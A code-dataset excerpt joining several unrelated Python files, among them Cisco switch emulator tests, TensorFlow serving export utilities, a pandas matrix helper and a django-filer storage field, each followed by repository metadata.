t.write("ip vrf forwarding NOT-DEFAULT-LAN")
t.readln("% VRF NOT-DEFAULT-LAN not configured.")
t.read("my_switch(config-if)#")
t.write("ip vrf forwarding SOME-LAN")
t.read("my_switch(config-if)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
assert_interface_configuration(t, "Fa0/2", [
"interface FastEthernet0/2",
" ip vrf forwarding SOME-LAN",
"end"])
t.write("conf t")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("no ip vrf SOME-LAN")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
assert_interface_configuration(t, "Fa0/2", [
"interface FastEthernet0/2",
"end"])
@with_protocol
def test_ip_vrf_default_lan(self, t):
enable(t)
t.write("conf t")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("interface Fa0/2")
t.read("my_switch(config-if)#")
t.write("ip vrf forwarding DEFAULT-LAN")
t.read("my_switch(config-if)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
assert_interface_configuration(t, "Fa0/2", [
"interface FastEthernet0/2",
" ip vrf forwarding DEFAULT-LAN",
"end"])
t.write("conf t")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("interface Fa0/2")
t.read("my_switch(config-if)#")
t.write("no ip vrf forwarding")
t.read("my_switch(config-if)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
assert_interface_configuration(t, "Fa0/2", [
"interface FastEthernet0/2",
"end"])
@with_protocol
def test_ip_setting_vrf_forwarding_wipes_ip_addresses(self, t):
enable(t)
create_vlan(t, "4000")
create_interface_vlan(t, "4000")
configuring_interface_vlan(t, "4000", do="ip address 10.10.0.10 255.255.255.0")
configuring_interface_vlan(t, "4000", do="ip address 10.10.1.10 255.255.255.0 secondary")
assert_interface_configuration(t, "Vlan4000", [
"interface Vlan4000",
" ip address 10.10.1.10 255.255.255.0 secondary",
" ip address 10.10.0.10 255.255.255.0",
"end"])
configuring_interface_vlan(t, "4000", do="ip vrf forwarding DEFAULT-LAN")
assert_interface_configuration(t, "Vlan4000", [
"interface Vlan4000",
" ip vrf forwarding DEFAULT-LAN",
" no ip address",
"end"])
configuring(t, do="no interface vlan 4000")
remove_vlan(t, "4000")
@with_protocol
def test_ip_helper(self, t):
enable(t)
create_interface_vlan(t, "4000")
assert_interface_configuration(t, "Vlan4000", [
"interface Vlan4000",
" no ip address",
"end"])
t.write("configure terminal")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("interface vlan 4000")
t.read("my_switch(config-if)#")
t.write("ip helper-address")
t.readln("% Incomplete command.")
t.readln("")
t.read("my_switch(config-if)#")
t.write("ip helper-address 1.1.1")
t.readln("% Incomplete command.")
t.readln("")
t.read("my_switch(config-if)#")
t.write("ip helper-address 1.a.1")
t.readln(" ^")
t.readln("% Invalid input detected at '^' marker.") # not incomplete
t.readln("")
t.read("my_switch(config-if)#")
t.write("ip helper-address invalid.ip")
t.readln(" ^")
t.readln("% Invalid input detected at '^' marker.")
t.readln("")
t.read("my_switch(config-if)#")
t.write("ip helper-address 10.10.0.1 EXTRA INFO")
t.readln(" ^")
t.readln("% Invalid input detected at '^' marker.")
t.readln("")
t.read("my_switch(config-if)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
configuring_interface_vlan(t, "4000", do="ip helper-address 10.10.10.1")
assert_interface_configuration(t, "Vlan4000", [
"interface Vlan4000",
" no ip address",
" ip helper-address 10.10.10.1",
"end"])
configuring_interface_vlan(t, "4000", do="ip helper-address 10.10.10.1")
configuring_interface_vlan(t, "4000", do="ip helper-address 10.10.10.2")
configuring_interface_vlan(t, "4000", do="ip helper-address 10.10.10.3")
assert_interface_configuration(t, "Vlan4000", [
"interface Vlan4000",
" no ip address",
" ip helper-address 10.10.10.1",
" ip helper-address 10.10.10.2",
" ip helper-address 10.10.10.3",
"end"])
configuring_interface_vlan(t, "4000", do="no ip helper-address 10.10.10.1")
assert_interface_configuration(t, "Vlan4000", [
"interface Vlan4000",
" no ip address",
" ip helper-address 10.10.10.2",
" ip helper-address 10.10.10.3",
"end"])
configuring_interface_vlan(t, "4000", do="no ip helper-address 10.10.10.1")
t.write("configure terminal")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("interface vlan 4000")
t.read("my_switch(config-if)#")
t.write("no ip helper-address 10.10.0.1 EXTRA INFO")
t.readln(" ^")
t.readln("% Invalid input detected at '^' marker.")
t.readln("")
t.read("my_switch(config-if)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
configuring_interface_vlan(t, "4000", do="no ip helper-address")
assert_interface_configuration(t, "Vlan4000", [
"interface Vlan4000",
" no ip address",
"end"])
configuring(t, do="no interface vlan 4000")
@with_protocol
def test_ip_route(self, t):
enable(t)
configuring(t, do="ip route 1.1.1.0 255.255.255.0 2.2.2.2")
t.write("show ip route static | inc 2.2.2.2")
t.readln("S 1.1.1.0 [x/y] via 2.2.2.2")
t.read("my_switch#")
t.write("show running | inc 2.2.2.2")
t.readln("ip route 1.1.1.0 255.255.255.0 2.2.2.2")
t.read("my_switch#")
configuring(t, do="no ip route 1.1.1.0 255.255.255.0 2.2.2.2")
t.write("show ip route static")
t.readln("")
t.read("my_switch#")
t.write("exit")
@with_protocol
def test_write_memory(self, t):
enable(t)
t.write("write memory")
t.readln("Building configuration...")
t.readln("OK")
t.read("my_switch#")
@with_protocol
def test_show_version(self, t):
enable(t)
t.write("show version")
t.readln("Cisco IOS Software, C3750 Software (C3750-IPSERVICESK9-M), Version 12.2(58)SE2, RELEASE SOFTWARE (fc1)")
t.readln("Technical Support: http://www.cisco.com/techsupport")
t.readln("Copyright (c) 1986-2011 by Cisco Systems, Inc.")
t.readln("Compiled Thu 21-Jul-11 01:53 by prod_rel_team")
t.readln("")
t.readln("ROM: Bootstrap program is C3750 boot loader")
t.readln("BOOTLDR: C3750 Boot Loader (C3750-HBOOT-M) Version 12.2(44)SE5, RELEASE SOFTWARE (fc1)")
t.readln("")
t.readln("my_switch uptime is 1 year, 18 weeks, 5 days, 1 hour, 11 minutes")
t.readln("System returned to ROM by power-on")
t.readln("System image file is \"flash:c3750-ipservicesk9-mz.122-58.SE2.bin\"")
t.readln("")
t.readln("")
t.readln("This product contains cryptographic features and is subject to United")
t.readln("States and local country laws governing import, export, transfer and")
t.readln("use. Delivery of Cisco cryptographic products does not imply")
t.readln("third-party authority to import, export, distribute or use encryption.")
t.readln("Importers, exporters, distributors and users are responsible for")
t.readln("compliance with U.S. and local country laws. By using this product you")
t.readln("agree to comply with applicable laws and regulations. If you are unable")
t.readln("to comply with U.S. and local laws, return this product immediately.")
t.readln("")
t.readln("A summary of U.S. laws governing Cisco cryptographic products may be found at:")
t.readln("http://www.cisco.com/wwl/export/crypto/tool/stqrg.html")
t.readln("")
t.readln("If you require further assistance please contact us by sending email to")
t.readln("export@cisco.com.")
t.readln("")
t.readln("cisco WS-C3750G-24TS-1U (PowerPC405) processor (revision H0) with 131072K bytes of memory.")
t.readln("Processor board ID FOC1530X2F7")
t.readln("Last reset from power-on")
t.readln("0 Virtual Ethernet interfaces")
t.readln("12 Gigabit Ethernet interfaces")
t.readln("The password-recovery mechanism is enabled.")
t.readln("")
t.readln("512K bytes of flash-simulated non-volatile configuration memory.")
t.readln("Base ethernet MAC Address : 00:00:00:00:00:00")
t.readln("Motherboard assembly number : 73-10219-09")
t.readln("Power supply part number : 341-0098-02")
t.readln("Motherboard serial number : FOC153019Z6")
t.readln("Power supply serial number : ALD153000BB")
t.readln("Model revision number : H0")
t.readln("Motherboard revision number : A0")
t.readln("Model number : WS-C3750G-24TS-S1U")
t.readln("System serial number : FOC1530X2F7")
t.readln("Top Assembly Part Number : 800-26859-03")
t.readln("Top Assembly Revision Number : C0")
t.readln("Version ID : V05")
t.readln("CLEI Code Number : COMB600BRA")
t.readln("Hardware Board Revision Number : 0x09")
t.readln("")
t.readln("")
t.readln("Switch Ports Model SW Version SW Image")
t.readln("------ ----- ----- ---------- ----------")
t.readln("* 1 12 WS-C3750G-24TS-1U 12.2(58)SE2 C3750-IPSERVICESK9-M")
t.readln("")
t.readln("")
t.readln("Configuration register is 0xF")
t.readln("")
t.read("my_switch#")
@with_protocol
def test_reset_port(self, t):
enable(t)
configuring_interface(t, "FastEthernet0/3", do="description shizzle the whizzle and drizzle with lizzle")
configuring_interface(t, "FastEthernet0/3", do="shutdown")
set_interface_on_vlan(t, "FastEthernet0/3", "123")
assert_interface_configuration(t, "FastEthernet0/3", [
"interface FastEthernet0/3",
" description shizzle the whizzle and drizzle with lizzle",
" switchport access vlan 123",
" switchport mode access",
" shutdown",
"end"])
configuring(t, "default interface FastEthernet0/3")
assert_interface_configuration(t, "FastEthernet0/3", [
"interface FastEthernet0/3",
"end"])
@with_protocol
def test_reset_port_invalid_interface_fails(self, t):
enable(t)
configuring_interface(t, "FastEthernet0/3", do="description shizzle the whizzle and drizzle with lizzle")
t.write("conf t")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("default interface WrongInterfaceName0/3")
t.readln("\s*\^", regex=True)
t.readln("% Invalid input detected at '^' marker (not such interface)")
t.readln("")
t.read("my_switch(config)#")
configuring(t, "default interface FastEthernet0/3")
@with_protocol
def test_standby_version(self, t):
enable(t)
create_vlan(t, "2999")
create_interface_vlan(t, "2999")
configuring_interface_vlan(t, "2999", do='standby version 2')
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" no ip address",
" standby version 2",
"end"])
configuring_interface_vlan(t, "2999", do='no standby version 2')
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" no ip address",
"end"])
configuring_interface_vlan(t, "2999", do='standby version 2')
configuring_interface_vlan(t, "2999", do='standby version 1')
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" no ip address",
"end"])
t.write("configure terminal")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("interface vlan 2999")
t.read("my_switch(config-if)#")
t.write("standby version")
t.readln("% Incomplete command.")
t.readln("")
t.read("my_switch(config-if)#")
t.write("standby version 3")
t.readln(" ^")
t.readln("% Invalid input detected at '^' marker.")
t.readln("")
t.read("my_switch(config-if)#")
t.write("standby version 2 2")
t.readln(" ^")
t.readln("% Invalid input detected at '^' marker.")
t.readln("")
t.read("my_switch(config-if)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" no ip address",
"end"])
configuring(t, do="no interface vlan 2999")
remove_vlan(t, "2999")
@with_protocol
def test_disable_ntp(self, t):
enable(t)
configuring_interface(t, "FastEthernet 0/3", do="ntp disable")
assert_interface_configuration(t, "FastEthernet0/3", [
"interface FastEthernet0/3",
" ntp disable",
"end"])
configuring_interface(t, "FastEthernet 0/3", do="no ntp disable")
assert_interface_configuration(t, "FastEthernet0/3", [
"interface FastEthernet0/3",
"end"])
class TestCiscoSwitchProtocolSSH(TestCiscoSwitchProtocol):
__test__ = True
tester_class = SshTester
class TestCiscoSwitchProtocolTelnet(TestCiscoSwitchProtocol):
__test__ = True
tester_class = TelnetTester
|
internap/fake-switches
|
tests/cisco/test_cisco_switch_protocol.py
|
Python
|
apache-2.0
| 58,284
| 0.002316
|
# -*- coding: utf-8 -*-
import sys
import pytest
py3 = sys.version_info[0] >= 3
class DummyCollector(pytest.collect.File):
def collect(self):
return []
def pytest_pycollect_makemodule(path, parent):
bn = path.basename
if "py3" in bn and not py3 or ("py2" in bn and py3):
return DummyCollector(path, parent=parent)
|
cloudera/hue
|
desktop/core/ext-py/pytest-4.6.11/doc/en/example/py2py3/conftest.py
|
Python
|
apache-2.0
| 348
| 0
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Configuration and utilities for receiving inputs at serving time."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import time
import six
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import parsing_ops
from tensorflow.python.platform import gfile
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import signature_constants
from tensorflow.python.saved_model import signature_def_utils
from tensorflow.python.util import compat
_SINGLE_FEATURE_DEFAULT_NAME = 'feature'
_SINGLE_RECEIVER_DEFAULT_NAME = 'input'
class ServingInputReceiver(collections.namedtuple(
'ServingInputReceiver',
['features', 'receiver_tensors', 'receiver_tensors_alternatives'])):
"""A return type for a serving_input_receiver_fn.
The expected return values are:
features: A `Tensor`, `SparseTensor`, or dict of string to `Tensor` or
`SparseTensor`, specifying the features to be passed to the model.
receiver_tensors: a `Tensor`, or a dict of string to `Tensor`, specifying
input nodes where this receiver expects to be fed by default. Typically,
this is a single placeholder expecting serialized `tf.Example` protos.
receiver_tensors_alternatives: a dict of string to additional
groups of receiver tensors, each of which may be a `Tensor` or a dict of
string to `Tensor`. These named receiver tensor alternatives generate
additional serving signatures, which may be used to feed inputs at
different points within the input reciever subgraph. A typical usage is
to allow feeding raw feature `Tensor`s *downstream* of the
tf.parse_example() op. Defaults to None.
"""
def __new__(cls, features, receiver_tensors,
receiver_tensors_alternatives=None):
if features is None:
raise ValueError('features must be defined.')
if not isinstance(features, dict):
features = {_SINGLE_FEATURE_DEFAULT_NAME: features}
for name, tensor in features.items():
if not isinstance(name, six.string_types):
raise ValueError('feature keys must be strings: {}.'.format(name))
if not (isinstance(tensor, ops.Tensor)
or isinstance(tensor, sparse_tensor.SparseTensor)):
raise ValueError(
'feature {} must be a Tensor or SparseTensor.'.format(name))
if receiver_tensors is None:
raise ValueError('receiver_tensors must be defined.')
if not isinstance(receiver_tensors, dict):
receiver_tensors = {_SINGLE_RECEIVER_DEFAULT_NAME: receiver_tensors}
for name, tensor in receiver_tensors.items():
if not isinstance(name, six.string_types):
raise ValueError(
'receiver_tensors keys must be strings: {}.'.format(name))
if not isinstance(tensor, ops.Tensor):
raise ValueError(
'receiver_tensor {} must be a Tensor.'.format(name))
if receiver_tensors_alternatives is not None:
if not isinstance(receiver_tensors_alternatives, dict):
raise ValueError(
'receiver_tensors_alternatives must be a dict: {}.'.format(
receiver_tensors_alternatives))
for alternative_name, receiver_tensors_alt in (
six.iteritems(receiver_tensors_alternatives)):
if not isinstance(receiver_tensors_alt, dict):
receiver_tensors_alt = {_SINGLE_RECEIVER_DEFAULT_NAME:
receiver_tensors_alt}
# Updating dict during iteration is OK in this case.
receiver_tensors_alternatives[alternative_name] = (
receiver_tensors_alt)
for name, tensor in receiver_tensors_alt.items():
if not isinstance(name, six.string_types):
raise ValueError(
'receiver_tensors keys must be strings: {}.'.format(name))
if not (isinstance(tensor, ops.Tensor)
or isinstance(tensor, sparse_tensor.SparseTensor)):
raise ValueError(
'receiver_tensor {} must be a Tensor or SparseTensor.'.format(
name))
return super(ServingInputReceiver, cls).__new__(
cls,
features=features,
receiver_tensors=receiver_tensors,
receiver_tensors_alternatives=receiver_tensors_alternatives)
def build_parsing_serving_input_receiver_fn(feature_spec,
default_batch_size=None):
"""Build a serving_input_receiver_fn expecting fed tf.Examples.
Creates a serving_input_receiver_fn that expects a serialized tf.Example fed
into a string placeholder. The function parses the tf.Example according to
the provided feature_spec, and returns all parsed Tensors as features.
Args:
feature_spec: a dict of string to `VarLenFeature`/`FixedLenFeature`.
default_batch_size: the number of query examples expected per batch.
Leave unset for variable batch size (recommended).
Returns:
A serving_input_receiver_fn suitable for use in serving.
"""
def serving_input_receiver_fn():
"""An input_fn that expects a serialized tf.Example."""
serialized_tf_example = array_ops.placeholder(dtype=dtypes.string,
shape=[default_batch_size],
name='input_example_tensor')
receiver_tensors = {'examples': serialized_tf_example}
features = parsing_ops.parse_example(serialized_tf_example, feature_spec)
return ServingInputReceiver(features, receiver_tensors)
return serving_input_receiver_fn
def build_raw_serving_input_receiver_fn(features, default_batch_size=None):
"""Build a serving_input_receiver_fn expecting feature Tensors.
Creates an serving_input_receiver_fn that expects all features to be fed
directly.
Args:
features: a dict of string to `Tensor`.
default_batch_size: the number of query examples expected per batch.
Leave unset for variable batch size (recommended).
Returns:
A serving_input_receiver_fn.
"""
def serving_input_receiver_fn():
"""A serving_input_receiver_fn that expects features to be fed directly."""
receiver_tensors = {}
for name, t in features.items():
shape_list = t.get_shape().as_list()
shape_list[0] = default_batch_size
shape = tensor_shape.TensorShape(shape_list)
# Reuse the feature tensor's op name (t.op.name) for the placeholder,
# excluding the index from the tensor's name (t.name):
# t.name = "%s:%d" % (t.op.name, t._value_index)
receiver_tensors[name] = array_ops.placeholder(
dtype=t.dtype, shape=shape, name=t.op.name)
# TODO(b/34885899): remove the unnecessary copy
# The features provided are simply the placeholders, but we defensively copy
# the dict because it may be mutated.
return ServingInputReceiver(receiver_tensors, receiver_tensors.copy())
return serving_input_receiver_fn
### Below utilities are specific to SavedModel exports.
def build_all_signature_defs(receiver_tensors,
export_outputs,
receiver_tensors_alternatives=None):
"""Build `SignatureDef`s for all export outputs."""
if not isinstance(receiver_tensors, dict):
receiver_tensors = {_SINGLE_RECEIVER_DEFAULT_NAME: receiver_tensors}
if export_outputs is None or not isinstance(export_outputs, dict):
raise ValueError('export_outputs must be a dict.')
signature_def_map = {}
excluded_signatures = {}
for output_key, export_output in export_outputs.items():
signature_name = '{}'.format(output_key or 'None')
try:
signature = export_output.as_signature_def(receiver_tensors)
signature_def_map[signature_name] = signature
except ValueError as e:
excluded_signatures[signature_name] = str(e)
if receiver_tensors_alternatives:
for receiver_name, receiver_tensors_alt in (
six.iteritems(receiver_tensors_alternatives)):
if not isinstance(receiver_tensors_alt, dict):
receiver_tensors_alt = {_SINGLE_RECEIVER_DEFAULT_NAME:
receiver_tensors_alt}
for output_key, export_output in export_outputs.items():
signature_name = '{}:{}'.format(receiver_name or 'None',
output_key or 'None')
try:
signature = export_output.as_signature_def(receiver_tensors_alt)
signature_def_map[signature_name] = signature
except ValueError as e:
excluded_signatures[signature_name] = str(e)
_log_signature_report(signature_def_map, excluded_signatures)
# The above calls to export_output.as_signature_def should return only
# valid signatures; if there is a validity problem, they raise ValueError,
# which we ignore above. Consequently the call to is_valid_signature here
# should not remove anything else; it's just an extra sanity check.
return {k: v for k, v in signature_def_map.items()
if signature_def_utils.is_valid_signature(v)}
_FRIENDLY_METHOD_NAMES = {
signature_constants.CLASSIFY_METHOD_NAME: 'Classify',
signature_constants.REGRESS_METHOD_NAME: 'Regress',
signature_constants.PREDICT_METHOD_NAME: 'Predict',
}
def _log_signature_report(signature_def_map, excluded_signatures):
"""Log a report of which signatures were produced."""
sig_names_by_method_name = collections.defaultdict(list)
# We'll collect whatever method_names are present, but also we want to make
# sure to output a line for each of the three standard methods even if they
# have no signatures.
for method_name in _FRIENDLY_METHOD_NAMES:
sig_names_by_method_name[method_name] = []
for signature_name, sig in signature_def_map.items():
sig_names_by_method_name[sig.method_name].append(signature_name)
# TODO(b/67733540): consider printing the full signatures, not just names
for method_name, sig_names in sig_names_by_method_name.items():
if method_name in _FRIENDLY_METHOD_NAMES:
method_name = _FRIENDLY_METHOD_NAMES[method_name]
logging.info('Signatures INCLUDED in export for {}: {}'.format(
method_name, sig_names if sig_names else 'None'))
if excluded_signatures:
logging.info('Signatures EXCLUDED from export because they cannot be '
'be served via TensorFlow Serving APIs:')
for signature_name, message in excluded_signatures.items():
logging.info('\'{}\' : {}'.format(signature_name, message))
if not signature_def_map:
logging.warn('Export includes no signatures!')
elif (signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY
not in signature_def_map):
logging.warn('Export includes no default signature!')
# When we create a timestamped directory, there is a small chance that the
# directory already exists because another worker is also writing exports.
# In this case we just wait one second to get a new timestamp and try again.
# If this fails several times in a row, then something is seriously wrong.
MAX_DIRECTORY_CREATION_ATTEMPTS = 10
def get_timestamped_export_dir(export_dir_base):
"""Builds a path to a new subdirectory within the base directory.
Each export is written into a new subdirectory named using the
current time. This guarantees monotonically increasing version
numbers even across multiple runs of the pipeline.
The timestamp used is the number of seconds since epoch UTC.
Args:
export_dir_base: A string containing a directory to write the exported
graph and checkpoints.
Returns:
The full path of the new subdirectory (which is not actually created yet).
Raises:
RuntimeError: if repeated attempts fail to obtain a unique timestamped
directory name.
"""
attempts = 0
while attempts < MAX_DIRECTORY_CREATION_ATTEMPTS:
export_timestamp = int(time.time())
export_dir = os.path.join(
compat.as_bytes(export_dir_base),
compat.as_bytes(str(export_timestamp)))
if not gfile.Exists(export_dir):
# Collisions are still possible (though extremely unlikely): this
# directory is not actually created yet, but it will be almost
# instantly on return from this function.
return export_dir
time.sleep(1)
attempts += 1
logging.warn(
'Export directory {} already exists; retrying (attempt {}/{})'.format(
export_dir, attempts, MAX_DIRECTORY_CREATION_ATTEMPTS))
raise RuntimeError('Failed to obtain a unique export directory name after '
'{} attempts.'.format(MAX_DIRECTORY_CREATION_ATTEMPTS))
def get_temp_export_dir(timestamped_export_dir):
"""Builds a directory name based on the argument but starting with 'temp-'.
This relies on the fact that TensorFlow Serving ignores subdirectories of
the base directory that can't be parsed as integers.
Args:
timestamped_export_dir: the name of the eventual export directory, e.g.
/foo/bar/<timestamp>
Returns:
A sister directory prefixed with 'temp-', e.g. /foo/bar/temp-<timestamp>.
"""
(dirname, basename) = os.path.split(timestamped_export_dir)
temp_export_dir = os.path.join(
compat.as_bytes(dirname),
compat.as_bytes('temp-{}'.format(basename)))
return temp_export_dir
|
dyoung418/tensorflow
|
tensorflow/python/estimator/export/export.py
|
Python
|
apache-2.0
| 14,219
| 0.005767
|
__author__ = 'thor'
import ut as ms
import pandas as pd
import ut.pcoll.order_conserving
from functools import reduce
class SquareMatrix(object):
def __init__(self, df, index_vars=None, sort=False):
if isinstance(df, SquareMatrix):
self = df.copy()
elif isinstance(df, pd.DataFrame):
self.df = df
self.index_vars = index_vars
self.value_vars = ms.pcoll.order_conserving.setdiff(list(self.df.columns), self.index_vars)
self.df = self.df[self.index_vars + self.value_vars]
else:
raise NotImplementedError("This case hasn't been implemented yet")
if sort:
self.df.sort(columns=self.index_vars, inplace=True)
def copy(self):
return SquareMatrix(df=self.df.copy(), index_vars=self.index_vars)
def transpose(self):
return SquareMatrix(df=self.df, index_vars=[self.index_vars[1], self.index_vars[0]])
def reflexive_mapreduce(self, map_fun, reduce_fun=None, broadcast_functions=True):
df = self.df.merge(self.df, how='inner', left_on=self.index_vars[1],
right_on=self.index_vars[0], suffixes=('', '_y'))
df[self.index_vars[1]] = df[self.index_vars[1] + '_y']
df.drop(labels=[self.index_vars[0] + '_y', self.index_vars[1] + '_y'], axis=1, inplace=True)
if not isinstance(map_fun, dict) and broadcast_functions:
map_fun = dict(list(zip(self.value_vars, [map_fun] * len(self.value_vars))))
for k, v in map_fun.items():
df[k] = v(df[k], df[k + '_y'])
df.drop(labels=[x + '_y' for x in self.value_vars], axis=1, inplace=True)
if not reduce_fun:
reduce_fun = dict()
for k, v in map_fun.items():
reduce_fun[k] = lambda x: reduce(v, x)
elif not isinstance(reduce_fun, dict) and broadcast_functions:
reduce_fun = dict(list(zip(self.value_vars, [reduce_fun] * len(self.value_vars))))
df = df.groupby(self.index_vars).agg(reduce_fun).reset_index(drop=False)
return SquareMatrix(df=df, index_vars=self.index_vars)
def reverse_indices(self):
return [self.index_vars[1], self.index_vars[0]]
def sort(self, **kwargs):
kwargs = dict({'columns': self.index_vars}, **kwargs)
sm = self.copy()
sm.df = sm.df.sort(**kwargs)
return sm
def __str__(self):
return self.df.__str__()
def __repr__(self):
return self.df.set_index(self.index_vars).__str__()
def head(self, num_of_rows=5):
return self.df.head(num_of_rows)
def tail(self, num_of_rows=5):
return self.df.tail(num_of_rows)
|
thorwhalen/ut
|
daf/struct.py
|
Python
|
mit
| 2,689
| 0.003719
|
from datetime import date, timedelta
INITIAL_OFFSET = timedelta(days=5)
class IntervalException(Exception):
"""
Exception to be raises when interval is behaving
weirdly - as not an interval
"""
def get_dates_for_timedelta(interval_delta, start=None, stop=None,
skip_weekend=False):
"""
For given interval_delta it will return list of dates starting from
``starting date``
:param interval_delta: interval_delta instance
:type interval_delta: datetime.timedelta
:param start: starting point of the interval
:type start: date
:param stop: when to stop
:param skip_weekend: don't place dates at weekends
:return: [datetime objects]
"""
if start is None:
start = date.today()
if stop is None:
stop = start + timedelta(days=365)
dates = [start]
while dates[-1] + interval_delta <= stop:
increased_date = dates[-1] + interval_delta
if skip_weekend and increased_date.isoweekday() > 5:
increased_date += timedelta(days=2)
if increased_date == dates[-1]:
raise IntervalException(interval_delta)
dates.append(increased_date)
return dates
|
WebArchivCZ/Seeder
|
Seeder/harvests/scheduler.py
|
Python
|
mit
| 1,219
| 0.00082
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import base64
import hashlib
import warnings
from io import BytesIO
from django.core.files.base import ContentFile
from django.utils import six
from easy_thumbnails import fields as easy_thumbnails_fields
from easy_thumbnails import files as easy_thumbnails_files
from .. import settings as filer_settings
from ..utils.filer_easy_thumbnails import ThumbnailerNameMixin
STORAGES = {
'public': filer_settings.FILER_PUBLICMEDIA_STORAGE,
'private': filer_settings.FILER_PRIVATEMEDIA_STORAGE,
}
THUMBNAIL_STORAGES = {
'public': filer_settings.FILER_PUBLICMEDIA_THUMBNAIL_STORAGE,
'private': filer_settings.FILER_PRIVATEMEDIA_THUMBNAIL_STORAGE,
}
THUMBNAIL_OPTIONS = {
'public': filer_settings.FILER_PUBLICMEDIA_THUMBNAIL_OPTIONS,
'private': filer_settings.FILER_PRIVATEMEDIA_THUMBNAIL_OPTIONS,
}
def generate_filename_multistorage(instance, filename):
if instance.is_public:
upload_to = filer_settings.FILER_PUBLICMEDIA_UPLOAD_TO
else:
upload_to = filer_settings.FILER_PRIVATEMEDIA_UPLOAD_TO
if callable(upload_to):
return upload_to(instance, filename)
else:
return upload_to
class MultiStorageFieldFile(ThumbnailerNameMixin,
easy_thumbnails_files.ThumbnailerFieldFile):
def __init__(self, instance, field, name):
"""
This is a little weird, but I couldn't find a better solution.
Thumbnailer.__init__ is called first for proper object inizialization.
Then we override some attributes defined at runtime with properties.
We cannot simply call super().__init__ because filer Field objects
doesn't have a storage attribute.
"""
easy_thumbnails_files.Thumbnailer.__init__(self, None, name)
self.instance = instance
self.field = field
self._committed = True
self.storages = self.field.storages
self.thumbnail_storages = self.field.thumbnail_storages
self.thumbnail_options = self.field.thumbnail_options
self.storage = self._storage
self.source_storage = self._source_storage
self.thumbnail_storage = self._thumbnail_storage
self.thumbnail_basedir = self._thumbnail_base_dir
@property
def _storage(self):
if self.instance.is_public:
return self.storages['public']
else:
return self.storages['private']
@property
def _source_storage(self):
if self.instance.is_public:
return self.storages['public']
else:
return self.storages['private']
@property
def _thumbnail_storage(self):
if self.instance.is_public:
return self.thumbnail_storages['public']
else:
return self.thumbnail_storages['private']
@property
def _thumbnail_base_dir(self):
if self.instance.is_public:
return self.thumbnail_options['public'].get('base_dir', '')
else:
return self.thumbnail_options['private'].get('base_dir', '')
def save(self, name, content, save=True):
content.seek(0) # Ensure we upload the whole file
super(MultiStorageFieldFile, self).save(name, content, save)
class MultiStorageFileField(easy_thumbnails_fields.ThumbnailerField):
attr_class = MultiStorageFieldFile
def __init__(self, verbose_name=None, name=None,
storages=None, thumbnail_storages=None, thumbnail_options=None, **kwargs):
if 'upload_to' in kwargs: # pragma: no cover
upload_to = kwargs.pop("upload_to")
if upload_to != generate_filename_multistorage:
warnings.warn("MultiStorageFileField can handle only File objects;"
"%s passed" % upload_to, SyntaxWarning)
self.storages = storages or STORAGES
self.thumbnail_storages = thumbnail_storages or THUMBNAIL_STORAGES
self.thumbnail_options = thumbnail_options or THUMBNAIL_OPTIONS
super(easy_thumbnails_fields.ThumbnailerField, self).__init__(
verbose_name=verbose_name, name=name,
upload_to=generate_filename_multistorage,
storage=None, **kwargs)
def value_to_string(self, obj):
value = super(MultiStorageFileField, self).value_to_string(obj)
if not filer_settings.FILER_DUMP_PAYLOAD:
return value
try:
payload_file = BytesIO(self.storage.open(value).read())
sha = hashlib.sha1()
sha.update(payload_file.read())
if sha.hexdigest() != obj.sha1:
warnings.warn('The checksum for "%s" diverges. Check for file consistency!' % obj.original_filename)
payload_file.seek(0)
encoded_string = base64.b64encode(payload_file.read()).decode('utf-8')
return value, encoded_string
except IOError:
warnings.warn('The payload for "%s" is missing. No such file on disk: %s!' % (obj.original_filename, self.storage.location))
return value
def to_python(self, value):
if isinstance(value, list) and len(value) == 2 and isinstance(value[0], six.text_type):
filename, payload = value
try:
payload = base64.b64decode(payload)
except TypeError:
pass
else:
if self.storage.exists(filename):
self.storage.delete(filename)
self.storage.save(filename, ContentFile(payload))
return filename
return value
|
jakob-o/django-filer
|
filer/fields/multistorage_file.py
|
Python
|
bsd-3-clause
| 5,617
| 0.001068
|
import string
from random import choice
from django.contrib.auth.models import User
def get_random_id():
valid_id = False
test_name = 'EMPTY'
while valid_id is False:
s1 = ''.join([choice(string.ascii_uppercase) for i in range(2)])
